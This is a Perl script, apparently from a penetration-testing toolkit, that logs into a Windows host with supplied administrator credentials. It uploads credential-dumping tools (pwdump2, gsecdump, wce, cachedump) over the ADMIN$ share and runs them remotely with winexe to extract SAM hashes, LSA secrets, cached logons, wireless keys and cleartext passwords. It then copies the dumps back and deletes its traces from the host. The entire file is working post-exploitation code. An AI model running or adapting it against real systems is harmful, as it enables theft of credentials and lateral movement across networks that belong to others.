#!/usr/bin/perl -w

use strict;
my $UPLOAD="/opt/neet/helpers/upload";

my $host=$ARGV[0];
my $user=$ARGV[1];
my $pass=$ARGV[2];

if (!defined($pass)){
	print ("$0\n");
	print ("Usage: $0 <host> <user> <password>\n");
	exit 1;
}
my $WorkingDir=$ENV{'PWD'};
my $REMOTE_DIR="_gethash";
my $ERROR=1;
my $OS="Unidentified\n";
my $bit=32;
my (@FILES,@RESULTS);

my $banner="*** gethash -> $host ***";

print "-" x length($banner) . "\n";
print $banner . "\n";

# Compensate for slashes in domain\username tuplets
if ($user =~ /\w\\\w/){
	$user =~ s/(\w)\\(\w)/$1\\\\$2/;
}
# And for quotes and shell expansions in passwords
$pass =~ s/([\"\$])/\\$1/g;

if (!authenticate()){
	print STDERR "Couldn't authenticate.\n";
	exit 1;
}
if (rmkdir()){
	print "*** Failure to create remote directory. Exiting.\n";
	exit 1;
}

check64();

print "->- Detected OS: Windows $OS ($bit bit) -<-\n";

if ($OS eq "NT4"){
	@FILES=("pw/dumplsa.dll","pw/ld2.exe","pw/samdump.dll","pw/pwdump2.exe");
	@RESULTS=("sam-${host}.txt","lsa-${host}.txt");
	uploadFiles();
	print "*** Dumping SAM\n";
	rexec("pwdump2.exe > sam-${host}.txt");
	print "*** Dumping LSA Secrets\n";
	rexec("ld2.exe > lsa-${host}.txt");

} elsif ($OS eq "2000") {

	# Tested on two Win2K SP4 machines. Worked a treat.
	@FILES=("gsec/cd.exe","gsec/gsd.exe");
	@RESULTS=("sam-${host}.txt","lsa-${host}.txt","cached-${host}.txt","used-${host}.txt","wireless-${host}.txt");
	uploadFiles();

	print "*** Dumping SAM\n";
	rexec("gsd.exe -s > sam-${host}.txt");
	print "*** Dumping LSA Secrets\n";
	rexec("gsd.exe -S -l > lsa-${host}.txt");

	print "*** Dumping Wireless Secrets\n";
	rexec("gsd.exe -S -w > wireless-${host}.txt");

	print "*** Dumping cached credentials\n";
	rexec("gsd.exe -u > used-${host}.txt");
	rexec("cd.exe > cached-${host}.txt");

} elsif ($OS eq "2003") {

	@FILES=("gsec/cd.exe","gsec/gsd.exe","wce/wce${bit}.exe");
	@RESULTS=("wce-${host}.txt","wce-clear-${host}.txt","sam-${host}.txt","lsa-${host}.txt","cached-${host}.txt","used-${host}.txt");
	uploadFiles();
	print "*** Dumping credentials from memory\n";
	rexec("wce${bit}.exe > wce-${host}.txt");
	rexec("wce${bit}.exe -w > wce-clear-${host}.txt");

	print "*** Dumping SAM\n";
	rexec("gsd.exe -s > sam-${host}.txt");
	print "*** Dumping LSA Secrets\n";
	rexec("gsd.exe -S -l > lsa-${host}.txt");

	print "*** Dumping cached credentials\n";
	rexec("gsd.exe -u > used-${host}.txt");
	rexec("cd.exe > cached-${host}.txt");

} elsif ($OS eq "XP") {

	# Gsecdump broke on XP - sam and used were ok, cached error, lsa error
	# Current config tested OK on XP SP2 running Symantec AV 16/10/2009

	@FILES=("gsec/cd.exe","gsec/gsd.exe","wce/wce${bit}.exe");
	@RESULTS=("wce-${host}.txt","wce-clear-${host}.txt","sam-${host}.txt","lsa-${host}.txt","cached-${host}.txt","used-${host}.txt","wireless-${host}.txt");
	uploadFiles();
	print "*** Dumping credentials from memory\n";
	rexec("wce${bit}.exe > wce-${host}.txt");
	rexec("wce${bit}.exe -w > wce-clear-${host}.txt");

	print "*** Dumping SAM\n";
	rexec("gsd.exe -s > sam-${host}.txt");

	print "*** Dumping LSA Secrets\n";
	rexec("gsd.exe -S -l > lsa-${host}.txt");

	print "*** Dumping Wireless Secrets\n";
	rexec("gsd.exe -S -w > wireless-${host}.txt");

	print "*** Dumping cached credentials\n";
	rexec("gsd.exe -u > used-${host}.txt");
	rexec("cd.exe > cached-${host}.txt");

} elsif ($OS eq "Vista") {

	# ******* Vista only tested on 64 bit, not sure if cachedump works on 32bit vista so not included *******
	@FILES=("gsec/cachedump.exe","gsec/gsd.exe","wce/wce${bit}.exe");
	@RESULTS=("wce-${host}.txt","wce-clear-${host}.txt","sam-${host}.txt","lsa-${host}.txt","cached-${host}.txt","used-${host}.txt");
	uploadFiles();
	print "*** $bit-bit OS detected ***\n";
	print "*** Dumping credentials from memory\n";
	rexec("wce${bit}.exe > wce-${host}.txt");
	rexec("wce${bit}.exe -w > wce-clear-${host}.txt");

	print "*** Dumping SAM\n";
	rexec("gsd.exe -s > sam-${host}.txt"); 
	print "*** Dumping LSA Secrets\n"; # this part of gsec dump works on vista 64
	rexec("gsd.exe -S -l > lsa-${host}.txt");

#	print "*** Dumping cached credentials\n";
	rexec("gsd.exe -u > used-${host}.txt"); # gsecdump2 required for vista 64
#	rexec("cachedump.exe > cached-${host}.txt"); # error in loadlibrary lsasrv.dll on x64

	#print "*** Dumping protected storage\n";
	#rexec("pstgdump.exe > protected-${host}.txt"); # not in vista

} elsif ($OS eq "2008") {
	# THIS DID NOT WORK ON CORE SERVICES SERVER
	
	@FILES=("gsec/gsd.exe","wce/wce${bit}.exe");
  @FILES=("wce/wce${bit}.exe");
	@RESULTS=("wce-${host}.txt","wce-clear-${host}.txt","sam-${host}.txt","lsa-${host}.txt","cached-${host}.txt","used-${host}.txt","wireless-${host}.txt");
	uploadFiles();
	print "Not fully supported OS yet\n";
	#print "*** Dumping credentials from memory\n";
	rexec("wce${bit}.exe > wce-${host}.txt");
	rexec("wce${bit}.exe -w > wce-clear-${host}.txt");

	#print "*** Dumping SAM\n";
	#rexec("gsd.exe -s > sam-${host}.txt");

	#print "*** Dumping cached credentials\n";
	#rexec("gsd.exe -u > used-${host}.txt");
}

gatherData();
cleanup();

my $credit='jonnyhightower [at] funkygeek.com';

print "\n" . "-" x length($credit) . "\n";
print $credit . "\n\n";

exit $ERROR;

#------------------------------------------------------------------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------------------------------------------------------------------

sub authenticate {
	my $return=`winexe --ostype=2 -U \"${user}\"%\"${pass}\" //$host \"cmd.exe /c ver\" 2>&1`;

	if ($return =~ /NT_STATUS_LOGON_FAILURE/i){
		print STDERR "Logon failure\n";
		return 0;
	}
	if ($return =~ /ERROR/i){
		return 0;
	}
	if ($return !~ /Windows/i){
		return 0;
	}
	if ($return =~ /Windows NT Version 4.0/i){
		$OS="NT4";
	} elsif ($return =~ /Windows \[Version 5.2./i){
		$OS="2003";
	} elsif ($return =~ /Windows 2000/i){
		$OS="2000";
	} elsif ($return =~ /Windows XP/i){
		$OS="XP";
	} elsif ($return =~ /Windows \[Version 6.1./i){
		$OS="2008";
	} elsif ($return =~ /Windows \[Version 6.0./i){
		$OS="Vista";
	}
	return 1;
}

sub rexec {
	my $cmd=shift();
	my $rc=system("winexe --ostype=2 -U \"${user}\"%\"${pass}\" //$host \"cmd.exe /c \\\"cd \%WINDIR\%\\${REMOTE_DIR} \& ${cmd}\\\"\"");
	$rc=$rc>>8;
	return $rc;
}

sub silentRexec {
	my $cmd=shift();
	my $rc=system("winexe  --ostype=2 -U \"${user}\"%\"${pass}\" //$host \"cmd.exe /c \\\"cd \%WINDIR\%\\${REMOTE_DIR} \& ${cmd}\\\"\" >/dev/null 2>&1");
	$rc=$rc>>8;
	return $rc;
}

sub check64 {
	my $arch1=`winexe -U \"${user}\"%\"${pass}\" //$host \"cmd.exe /c ECHO %PROCESSOR_ARCHITECTURE%\" 2>&1`;
	if ($arch1 =~ /AMD64/i){
		$bit=64;
	} 
	return 1;
}

sub cleanup {
	print "*** Cleaning up the remote host $host...\n";
	# Clean up the winexe service - delete the service
	#silentRexec("cmd.exe /c ghsc.exe delete winexesvc"); 
	#silentRexec("cmd.exe /c net stop winexesvc");
	system("winexe --uninstall --ostype=2 -U \"${user}\"%\"${pass}\" //$host \"cmd.exe /c ver\" >/dev/null 2>&1");
	for my $file (@FILES){
		rdel($file);
	}
	for my $file (@RESULTS){
		rdel($file);		
	}
	return rrmdir();
}

sub gatherData {
	print "*** Retrieving data...\n";
	for my $file (@RESULTS){
		download($file);
	}
}

sub upload {
	my $file = shift();
	my $remote = $file;
	if ($file =~ /\//){
		$remote =~ s/^[\S\s]+\/(\S+)$/$1/;
	}
	my $rc=1;
	if (-f "${UPLOAD}/$file"){
		$rc=system("smbclient //${host}/ADMIN\$ -U \"$user\" \"$pass\" -c \"PUT ${UPLOAD}/$file $REMOTE_DIR\\$remote\" >/dev/null 2>&1");
		$rc = $rc>>8;
	}
	return $rc;
}

sub download {
	my $file = shift();
	my $rc=system("smbclient //${host}/ADMIN\$ -U \"$user\" \"$pass\" -c \"GET $REMOTE_DIR\\$file ${WorkingDir}/$file\" >/dev/null 2>&1");
	$rc = $rc>>8;
	return $rc;
}

sub rdel {
	my $file=shift();
	if ($file =~ /\//){
		$file =~ s/^[\S\s]+\/(\S+)$/$1/;
	}
	my $rc=system("smbclient //${host}/ADMIN\$ -U \"$user\" \"$pass\" -c \"DEL $REMOTE_DIR\\$file \" >/dev/null 2>&1");
	$rc = $rc>>8;
	return $rc;
}

sub rmkdir {
	my $rc=system("smbclient //${host}/ADMIN\$ -U \"$user\" \"$pass\" -c \"MKDIR $REMOTE_DIR\" >/dev/null 2>&1");
	$rc = $rc>>8;
	return $rc;
}

sub rrmdir {
	my $rc=system("smbclient //${host}/ADMIN\$ -U \"$user\" \"$pass\" -c \"RMDIR $REMOTE_DIR\" >/dev/null 2>&1");
	$rc = $rc>>8;
	return $rc;
}

sub uploadFiles {
	for my $file (@FILES) {
		if (upload($file)){
			print "*** Failed to upload $file\n";
			$ERROR=1;
			last;
		} else {
			$ERROR=0;
		}
	}
	if ($ERROR){
		print "*** There was an error during the file upload process.\n";
		exit 1;
	}
}

